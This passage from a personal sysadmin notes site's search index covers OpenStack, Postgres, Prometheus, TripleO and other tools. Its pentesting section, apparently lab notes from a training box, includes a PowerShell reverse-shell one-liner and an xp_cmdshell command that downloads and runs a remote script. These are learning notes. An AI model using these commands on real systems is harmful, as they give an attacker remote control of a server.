    nova evacuate 1d6a436b-e18e-45ce-8b01-bee4a7126f81\n
    "},{"location":"openstack/#evacuate-single-server-from-compute-to-a-specific-destination","title":"Evacuate single server from compute to a specific destination","text":"
    nova evacuate 5f58a1bf-a7f9-4952-b980-af9d52a11e66 qasite1-compute001.localdomain\n
    "},{"location":"openstack/#openstack-create-image-with-different-id","title":"Openstack create image with different id.","text":"

    Use the --id flag

    openstack image create --id cirros-0.4.0 --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    07d76f4e-c920-49ea-af06-bd3c322f16cf\n\nopenstack router set --external-gateway EXT_NET --enable-snat --fixed-ip subnet=EXT_SUB,ip-address=192.168.70.2\n\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n\nneutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n\nnetwork : e23f7863-6e84-4395-bbbb-45877e950f2a\nsubnet : 5bee0941-8d7f-4869-896d-e34e1f2e8b3d\n\n9ce38b2c-b13b-4e65-8e68-32b146115a62 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.10 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_1\n\neefa2140-fd69-4daf-8b0d-0eafcf3e24b9 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.11 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_2\n\nneutron net-create PROV_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --allocation-pool start=192.168.71.10,end=192.168.71.100 --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n
    "},{"location":"openstack/#random-useful-commands","title":"Random useful commands","text":"
    openstack server list --all -c ID -c Name --host $NOVA_COMPUTE_NAME_HERE -f value\n
    "},{"location":"openstack/#upload-custom-image","title":"Upload custom image","text":"
    openstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    "},{"location":"openstack/#create-flavor","title":"Create flavor","text":"
    openstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\nopenstack flavor create --ram 16384 --disk 21 --vcpus 8 \\\n--private \\\n--project $PROJECT_ID_HERE \\\n--property aggregate_instance_extra_specs:$HOST_AGG_NAME_HERE='true' \\\n--property hw:cpu_policy='dedicated' \\\n--property hw:cpu_thread_policy='prefer' \\\n--property hw:mem_page_size='1GB' \\\n--property hw:numa_cpus.0='1-7' \\\n--property hw:numa_cpus.1='0' \\\n--property hw:numa_mem.0='8192' \\\n--property hw:numa_mem.1='8192' \\\n--property hw:numa_mempolicy='strict' \\\n--property hw:numa_nodes='2' \\\nTEST\n
    "},{"location":"openstack/#create-vm","title":"Create VM","text":"
    openstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-1\nopenstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-2\n
    "},{"location":"openstack/#compute-node-requirements","title":"Compute node requirements","text":"
    https://docs.openstack.org/nova/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-option1-rdo.html\n
    "},{"location":"openstack/#create-a-external-network-with-a-subnet-attached-to-that-network","title":"Create a external network with a subnet attached to that network.","text":"
    neutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n
    "},{"location":"openstack/#random-commands","title":"Random commands","text":"
    #Create image\nopenstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n\n#Create flavor\nopenstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\n#Create network\nopenstack network create network-floating-ip1\nopenstack floating ip create --subnet floating-ip-1\n\n#Create provider network with vlan\nopenstack network create --share --provider-physical-network provider --provider-network-type vlan provider1\n
    /etc/hosts\n\n10.12.0.2     controller01\n\n10.12.0.3       compute01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.3       compute01\n\n10.12.0.2       controller01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.4       compute02\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.5       compute03\n\n################################\n\n10.12.0.5       compute03\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.4       compute02\n
    Placeholder password : openstack2019\n\nRABBIT_PASS : openstack2019\nrabbitmqctl add_user openstack openstack2019\n\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'localhost' \\\nIDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'%' \\\nIDENTIFIED BY 'openstack2019';\n\n\nconnection = mysql+pymysql://keystone:openstack2019@controller01/keystone\n\n\nkeystone-manage bootstrap --bootstrap-password openstack2019 \\\n  --bootstrap-admin-url http://controller01:5000/v3/ \\\n  --bootstrap-internal-url http://controller01:5000/v3/ \\\n  --bootstrap-public-url http://controller01:5000/v3/ \\\n  --bootstrap-region-id RegionOne\n\n\nexport OS_USERNAME=admin\nexport OS_PASSWORD=openstack2019\nexport OS_PROJECT_NAME=admin\nexport OS_USER_DOMAIN_NAME=Default\nexport OS_PROJECT_DOMAIN_NAME=Default\nexport OS_AUTH_URL=http://controller01:5000/v3\nexport OS_IDENTITY_API_VERSION=3\n\n\n\nopenstack domain create --description \"Test Domain\" example\n\nopenstack project create --domain default \\\n  --description \"Service Project\" service\n\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nwww_authenticate_uri  = http://controller01:5000\nauth_url = http://controller01:5000\nmemcached_servers = controller01:11211\nauth_type = password\nproject_domain_name = Default\nuser_domain_name = Default\nproject_name = service\nusername = glance\npassword = openstack2019\n\n\n\n### Deploy Compute NOVA service on Controller node.\n
    CREATE DATABASE nova_api;\nCREATE DATABASE nova;\nCREATE DATABASE nova_cell0;\nCREATE DATABASE placement;\n\n\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nopenstack user create --domain default --password-prompt nova\n\nopenstack role add --project service --user nova admin\n\n\nopenstack service create --name nova \\\n  --description \"OpenStack Compute\" compute\n\nopenstack endpoint create --region RegionOne \\\n  compute public http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute internal http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute admin http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  placement public http://controller01:8778\n\nopenstack endpoint create --region RegionOne \\\n  placement internal http://controller01:8778\n\n\nopenstack endpoint create --region RegionOne \\\n  placement admin http://controller01:8778\n\n\nmodprobe br_netfilter\necho \"$(sysctl -w net.bridge.bridge-nf-call-iptables=1)\" >> /etc/sysctl.conf\necho \"$(sysctl -w net.bridge.bridge-nf-call-ip6tables=1)\" >> /etc/sysctl.conf\nsysctl -p /etc/sysctl.conf\n\n\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nopenstack endpoint create --region RegionOne \\\n  network public http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network internal http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network admin http://controller01:9696\n\n\nopenstack subnet create --network provider \\\n  --allocation-pool start=10.13.0.100,end=10.13.0.200 \\\n  --dns-nameserver 10.13.0.1 --gateway 10.13.0.1 \\\n  --subnet-range 10.13.0.0/24 provider\n\n\n\nopenstack server create --flavor m1.nano --image cirros \\\n  --nic net-id=dee9dde7-0edb-4311-a06e-5ffb98144527 --security-group default \\\n  provider-instance\n\n\nnova-manage cell_v2 map_cell0\nnova-manage db sync\n
    "},{"location":"openvpn/","title":"OpenVPN","text":""},{"location":"openvpn/#connect-to-a-remote-server","title":"Connect to a remote server","text":" 
    sudo openvpn --config s2s-client.ovpn --daemon --status /var/log/openvpn-status 5\n
    "},{"location":"opnfv/","title":"OPNFV","text":""},{"location":"opnfv/#random-notes","title":"Random notes","text":"

    Source : https://readthedocs.org/projects/opnfv-yardstick/downloads/pdf/stable-hunter/

    Yardstick GUI : http://10.10.99.43:8888/gui/index.html (Need the full path)

    #Main folder\n/home/opnfv/repos/yardstick\n#Workspace\n/tmp/workspace/yardstick\n
    "},{"location":"ovs/","title":"OVS","text":""},{"location":"ovs/#openstack-ovs-concepts","title":"Openstack OVS concepts","text":"

    br-int

    br-tun

    br-ext

    "},{"location":"ovs/#useful-commands","title":"Useful commands","text":"
    ovs-vsctl list interface\novs-vsctl list port\novs-vsctl show\novs-appctl fdb/show mybridge\n

    Show all OVS Bridges (OVS Bridges are virtual switches that are linking different ports creating in each switch)

    ovs-vsctl show\n

    List interfaces/ports attached to a bridge

    ovs-vsctl list-ifaces br-int\n
    "},{"location":"pentest/","title":"Pentesting","text":""},{"location":"pentest/#recon","title":"RECON","text":""},{"location":"pentest/#windows-commands","title":"Windows commands","text":"

    Output the contents of a file

    type potato\n

    Show current user

    whoami\n
    "},{"location":"pentest/#nmap","title":"NMAP","text":"

    Find TCP ports that are active

    ports=$(nmap -p- --min-rate=1000 -T4 $TARGET_IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//)\n\nnmap -p- --min-rate=1000 -T4 $TARGET_IP -v\n

    Scan the ports that we're found + service detection.

    nmap -sC -sV -p$ports $TARGET_IP\n\nlaurentdumont@cr300-kali:~$ nmap -sC -sV -p 1433 10.10.10.27\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 12:37 EST\nNmap scan report for 10.10.10.27\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE  VERSION\n1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM\n| ms-sql-ntlm-info: \n|   Target_Name: ARCHETYPE\n|   NetBIOS_Domain_Name: ARCHETYPE\n|   NetBIOS_Computer_Name: ARCHETYPE\n|   DNS_Domain_Name: Archetype\n|   DNS_Computer_Name: Archetype\n|_  Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-11-06T18:53:07\n|_Not valid after:  2050-11-06T18:53:07\n|_ssl-date: 2020-11-12T18:56:28+00:00; +1h18m29s from scanner time.\n\nHost script results:\n|_clock-skew: mean: 1h18m28s, deviation: 0s, median: 1h18m28s\n| ms-sql-info: \n|   10.10.10.27:1433: \n|     Version: \n|       name: Microsoft SQL Server 2017 RTM\n|       number: 14.00.1000.00\n|       Product: Microsoft SQL Server 2017\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 1433\n
    "},{"location":"pentest/#smb-file-sharing","title":"SMB (file sharing)","text":"

    List Shares

    smbclient -N -L \\\\\\\\$TARGET_IP\\\\\n

    Connect to Share

    smbclient -N \\\\\\\\$TARGET_IP\\\\backups\n

    Get files from share

    laurentdumont@cr300-kali:~$ smbclient -N \\\\\\\\10.10.10.27\\\\backups\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Tue Nov 10 17:21:13 2020\n  ..                                  D        0  Tue Nov 10 17:21:13 2020\n  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020\n  user.txt                            A       32  Tue Feb 25 09:37:36 2020\n\n                10328063 blocks of size 4096. 7108669 blocks available\n\nsmb: \\> get user.txt\ngetting file \\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)\n
    "},{"location":"pentest/#using-imppacket","title":"Using ImpPacket","text":"
    git clone https://github.com/SecureAuthCorp/impacket\n# Move the utility from ./examples into the root folder\n\n# Run the utility\npython3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth\n\n# OR INSTALL ALL EXAMPLES (execute in project root folder)\npip3 install .\n
    "},{"location":"pentest/#microsoft-sql","title":"Microsoft SQL","text":""},{"location":"pentest/#check-if-user-is-admin","title":"Check if user is admin","text":"
    SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')\n\n\n-----------   \n\n          1   \n

    IF 1 user is admin.

    "},{"location":"pentest/#validate-in-which-context-sql-server-is-running-and-enable-the-xp_cmdshell-module","title":"Validate in which context SQL Server is running and enable the 'xp_cmdshell' module.","text":"
    EXEC sp_configure 'Show Advanced Options', 1;\nreconfigure;\nsp_configure;\n\nEXEC sp_configure 'xp_cmdshell', 1\nreconfigure;\nxp_cmdshell \"whoami\"\n\nSQL>  xp_cmdshell \"whoami\" \noutput                                                                             \n\n--------------------------------------------------------------------------------   \n\narchetype\\sql_svc                                                                  \n\nNULL\n
    "},{"location":"pentest/#netcat-nc","title":"NETCAT (nc)","text":"

    Create a listener on tcp port 443

    sudo nc -lvnp 443\n
    "},{"location":"pentest/#windows-shell","title":"Windows Shell","text":"

    Attempt to connect to a listener and open a shell using TCP port 443. You need to replace the IP of the machine that is listening (with nc for example)

    $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.3\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"# \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() \n

    Execute the command on the SQL server. This will attempt to get the shell.ps1 file and execute it in the context of the user running the SQL server.

    xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.53/shell.ps1\\\");\"\n
    "},{"location":"pentest/#burp","title":"BURP","text":""},{"location":"pentest/#burp-intruder-sniper","title":"BURP Intruder Sniper","text":"
    GET /cdn-cgi/login/admin.php?content=accounts&id=\u00a7param1\u00a7 HTTP/1.1\nHost: 10.10.10.28\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: user=34322; role=admin\nConnection: close\n
    "},{"location":"pentest/#privilege-escalation-flow","title":"Privilege escalation flow","text":""},{"location":"pentest/#information-gathering","title":"Information gathering","text":"

    Get OS version

    lsb_release -a\n

    Get Kernel version

    uname -a\n

    Get current user info

    id\n
    "},{"location":"postgres/","title":"Postgres","text":""},{"location":"postgres/#connect-to-a-database","title":"Connect to a database","text":"
    psql -h 192.168.2.40 -U postgres hq_data\n
    "},{"location":"postgres/#create-a-database-and-a-user-with-admin-privileges","title":"Create a database and a user with admin privileges","text":"
    sudo apt-get install postgresql postgresql-client\nsudo -u postgres psql\ncreate database netbox;\ncreate user netbox_user with encrypted password 'test';\ngrant all privileges on database netbox to netbox_user;\n
    "},{"location":"postgres/#create-read-only-user","title":"Create Read only user","text":"
    CREATE ROLE read_only_user WITH LOGIN PASSWORD 'vKDHrGZuhH6vNf01VdyJ' \nNOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE NOREPLICATION VALID UNTIL 'infinity';\n\\connect hq_data;\n\nGRANT CONNECT ON DATABASE hq_data TO read_only_user;\nGRANT USAGE ON SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO read_only_user;\nREVOKE CREATE ON SCHEMA public FROM PUBLIC;\n\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO read_only_user;\n
    "},{"location":"postgres/#show-databases","title":"Show databases","text":"
    postgres=# \\l\n                                  List of databases\n   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   \n-----------+----------+----------+-------------+-------------+-----------------------\n ara       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +\n           |          |          |             |             | postgres=CTc/postgres+\n           |          |          |             |             | ara_user=CTc/postgres\n postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | \n template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n(4 rows)\n
    "},{"location":"postgres/#show-users","title":"Show users","text":"
    ara=> \\du\n                                   List of roles\n Role name |                         Attributes                         | Member of \n-----------+------------------------------------------------------------+-----------\n ara_user  | Create DB                                                  | {}\n postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}\n
    "},{"location":"postgres/#show-tables","title":"Show tables","text":"
    SELECT *\nFROM pg_catalog.pg_tables\nWHERE schemaname != 'pg_catalog' AND \n    schemaname != 'information_schema';\n
    "},{"location":"postgres/#describe-a-table","title":"Describe a table","text":"
    \\d TABLE NAME\n
    "},{"location":"postgres/#drop-table","title":"Drop table","text":"
    drop table hq_electricity_consumption ;\n
    "},{"location":"postgres/#show-active-user-sessions","title":"Show active user sessions","text":"
    select pid as process_id, \n       usename as username, \n       datname as database_name, \n       client_addr as client_address, \n       application_name,\n       backend_start,\n       state,\n       state_change\nfrom pg_stat_activity;\n
    "},{"location":"prometheus/","title":"Prometheus","text":"
    #Docker volume - Prometheus config\nsudo docker volume create prometheus-config\n\n#Docker volume - Prometheus metrics and adata\nsudo docker volume create prometheus-data\n\nsudo docker run -d -p 9090:9090 -v prometheus-config:/prometheus-config -v prometheus-data:/prometheus prom/prometheus --config.file=/prometheus-config/prometheus.yml\n

    Grafana container

    sudo docker volume create grafana-config\nsudo docker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  -e \"GF_SECURITY_ADMIN_PASSWORD=PASSWORD_HERE\" \\\n  grafana/grafana\n

    Blackbox exporter

    docker run --rm -d -p 9115:9115 --name blackbox_exporter -v `pwd`:/config prom/blackbox-exporter:master --config.file=/config/blackbox.yml\n
    "},{"location":"proxmox/","title":"Proxmox","text":""},{"location":"proxmox/#user-and-permission-management","title":"User and permission management","text":""},{"location":"proxmox/#full-admin-over-specific-vms","title":"Full admin over specific VMs","text":"
    # Pool + VM are inside that pool.\n# Assume that the user already exists and we want to allow permissions on a specific group of VM.\npveum groupadd po-vm-group -comment \"PO VMs only\"\npveum aclmod /pool/PO-POOL-1/ -group po-vm-group -role PVEAdmin\npveum usermod riyoth@pam -group po-vm-group\n
    "},{"location":"python/","title":"Python","text":""},{"location":"python/#install-latest-python-on-ubuntu-side-by-side-with-os-version","title":"Install latest python on Ubuntu side by side with OS version","text":"
    sudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt install python3.13-full\npython3.13 --version\n
    "},{"location":"python/#profiling-a-python-application","title":"Profiling a python application.","text":"
    pip3 install line_profiler\n

    Add the @profile to each function that is to be profiled

    # Use the decorator\n@profile\ndef some_func(*args, **kwargs)\n    ...\n

    Start the profiling process

    python3 -m line_profiler tag-exporter.py.lprof\n
    Timer unit: 1e-06 s\n\nTotal time: 2e-06 s\nFile: tag-exporter.py\nFunction: __init__ at line 13\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    13                                               @profile\n    14                                               def __init__(self):\n    15         1          2.0      2.0    100.0          self._endpoint = '6666'\n\nTotal time: 14.99 s\nFile: tag-exporter.py\nFunction: collect at line 17\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    17                                               @profile\n    18                                               def collect(self):\n    19         5        115.0     23.0      0.0          GITLAB_PROJECTS_ID_LIST = os.getenv('GITLAB_PROJECTS_ID').split(',')\n    20         5         47.0      9.4      0.0          GITLAB_API_TOKEN = os.getenv('GITLAB_API_TOKEN')\n    21                                           \n    22         5      25743.0   5148.6      0.2          gl = gitlab.Gitlab('https://gitlab.gitlab.maker.studio', private_token=GITLAB_API_TOKEN, ssl_verify=False)\n    23                                           \n    24                                           \n    25        23         28.0      1.2      0.0          for project_id in GITLAB_PROJECTS_ID_LIST:\n    26        19    4103967.0 215998.3     27.4              project = gl.projects.get(project_id)\n    27        19    2781067.0 146371.9     18.6              tags = project.tags.list(per_page='1')\n    28                                                       # Get most recent tag - the tag list is returned \n    29        19        189.0      9.9      0.0              latest_tag = tags[0]\n    30                                           \n    31                                           \n    32        19         66.0      3.5      0.0              gitlab_tag_metric = Metric('gitlab_tag_version',\n    33        19        494.0     26.0      0.0          'Latest Gitlab tags for the project', 'summary')\n    34        19         73.0      3.8      0.0              gitlab_tag_metric.add_sample('gitlab_tag_version',\n    35        19        822.0     43.3      0.0          value='0', labels={'tag_version':str(latest_tag.name), 'project_name':str(project.name)})\n    36        19         51.0      2.7      0.0              yield gitlab_tag_metric\n    37                                           \n    38                                                       # Get the .gitlab-ci.yml from reach project in order to validate the target from the releases\n    39        18    4162769.0 231264.9     27.8              file_content = project.files.raw('.gitlab-ci.yml', 'master')\n    40        18    3913465.0 217414.7     26.1              test = yaml.safe_load(file_content)\n    41       144        132.0      0.9      0.0              for library_name, version_value in test['variables'].items():\n    42       126         85.0      0.7      0.0                  if 'VERSION' in library_name:\n    43        54         32.0      0.6      0.0                      library_version = version_value\n    44        54         39.0      0.7      0.0                      project_version_req = Metric('project_version_req',\n    45        54        287.0      5.3      0.0                      'Project versions requirements in Master branch', 'summary')\n    46        54         39.0      0.7      0.0                      project_version_req.add_sample('project_version_req',\n    47        54        432.0      8.0      0.0                      value='0', labels={'project':str(project.name), 'library_name':str(library_name),'target_version':str(library_version)})\n    48        54         38.0      0.7      0.0                      yield project_version_req\n
    "},{"location":"rasppi/","title":"RaspPi","text":"
    /home/user/.config/autostart/.desktop\n\n[Desktop Entry]\nType=Application\nExec=lxterminal -e \"vlc --fullscreen --loop --no-osd /home/bacon/Documents/ccop-loop.mp4\"\n
    "},{"location":"security/","title":"Security","text":""},{"location":"security/#disable-rpcbind","title":"Disable RPCBind.","text":"
    systemctl stop rpcbind.socket\nsystemctl disable rpcbind.socket\nsystemctl stop rpcbind\nsystemctl disable rpcbind\nnetstat -punta | grep 111\n
    "},{"location":"splunk/","title":"Splunk","text":""},{"location":"splunk/#_1","title":"Splunk","text":"

    Clear the splunk index and all data gathered. Will delete most of the existing data!

    cd /opt/splunk/bin\n./splunk stop\n./splunk clean eventdata\n./splunk start\n
    "},{"location":"terraform/","title":"Terraform","text":""},{"location":"terraform/#deployment-flow","title":"Deployment flow","text":"
    terraform init\nterraform apply\n
    "},{"location":"terraform/#terraform-debug","title":"Terraform debug","text":"
    TF_LOG=DEBUG OS_DEBUG=1 terraform apply\n
    "},{"location":"tripleo/","title":"Tripleo","text":""},{"location":"tripleo/#update-all-the-system-packages-first","title":"Update all the system packages first","text":"
    yum update\n
    "},{"location":"tripleo/#undercloud-deployment","title":"Undercloud deployment","text":"
    sudo useradd stack\nsudo passwd stack  # specify a password\n\necho \"stack ALL=(root) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers.d/stack\nsudo chmod 0440 /etc/sudoers.d/stack\n\nsu - stack\n
    "},{"location":"tripleo/#get-the-packages-for-centos","title":"Get the packages for Centos","text":"
    sudo yum install -y https://trunk.rdoproject.org/centos7/current/python2-tripleo-repos-0.0.1-0.20191108012952.2655019.el7.noarch.rpm\n
    "},{"location":"tripleo/#install-the-rocky-repository","title":"Install the Rocky repository","text":"
    sudo -E tripleo-repos -b stein current\n
    "},{"location":"tripleo/#get-the-tripleo-cli-client-lots-of-stuff-to-install","title":"Get the TripleO CLI client (lots of stuff to install)","text":"
    sudo yum install -y python-tripleoclient\n
    "},{"location":"tripleo/#copy-the-default-deployment-template","title":"Copy the default deployment template","text":"
    cp /usr/share/python-tripleoclient/undercloud.conf.sample ~/undercloud.conf\n
    "},{"location":"tripleo/#deploy-the-undercloud","title":"Deploy the Undercloud","text":"
    openstack undercloud install\n
    "},{"location":"tripleo/#add-dns-to-overcloud","title":"Add DNS to Overcloud","text":"
    (undercloud) [stack@director ~]$ openstack subnet list\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| ID                                   | Name            | Network                              | Subnet          |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| 08a306ed-a5e8-47cd-ac66-a67722d03a42 | ctlplane-subnet | fcda1208-3d2c-4b9c-a241-c4bcd0479b9f | 192.168.24.0/24 |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n\nopenstack subnet set 08a306ed-a5e8-47cd-ac66-a67722d03a42 --dns-nameserver 8.8.8.8\n
    "},{"location":"tripleo/#overcloud-deployment","title":"Overcloud Deployment","text":"
    export DIB_YUM_REPO_CONF=\"/etc/yum.repos.d/delorean*\"\n\n#Build the images for the Overcloud\nopenstack overcloud image build\n\n# Upload the images\nopenstack overcloud image upload\n
    "},{"location":"tripleo/#register-the-nodes","title":"Register the nodes","text":"

    The instackenv.json file.

    {\n    \"nodes\": [\n        {\n            \"mac\":[\n                \"52:54:00:25:ca:d3\"\n            ],\n            \"name\": \"ooo-controller001\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16001\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1a:cc:2a\"\n            ], \n            \"name\": \"ooo-controller002\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16002\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1c:0c:94\"\n            ],\n            \"name\": \"ooo-controller003\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16003\"\n        }\n    ]\n}\n
    "},{"location":"tripleo/#create-the-nodes-within-ironic-openstack","title":"Create the nodes within Ironic Openstack","text":"
    openstack overcloud node import instackenv.json\n
    "},{"location":"tripleo/#ironic-paths","title":"Ironic paths","text":"
    #DNSMASQ\n/var/lib/ironic-inspector/dhcp-hostsdir\n#Ironic PXE\n/var/lib/ironic/httpboot/\n
    "},{"location":"tripleo/#list-nodes","title":"List nodes","text":"
    openstack baremetal node list\n
    "},{"location":"tripleo/#start-introspection","title":"Start introspection","text":"
    openstack overcloud node introspect --all-manageable\n\n# One node\nopenstack overcloud node introspect 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#if-introspection-works-make-nodes-available","title":"If introspection works, make nodes available","text":"
    openstack overcloud node provide --all-manageable\n
    "},{"location":"tripleo/#deploy-overcloud","title":"Deploy Overcloud","text":"
    openstack overcloud deploy --templates\n
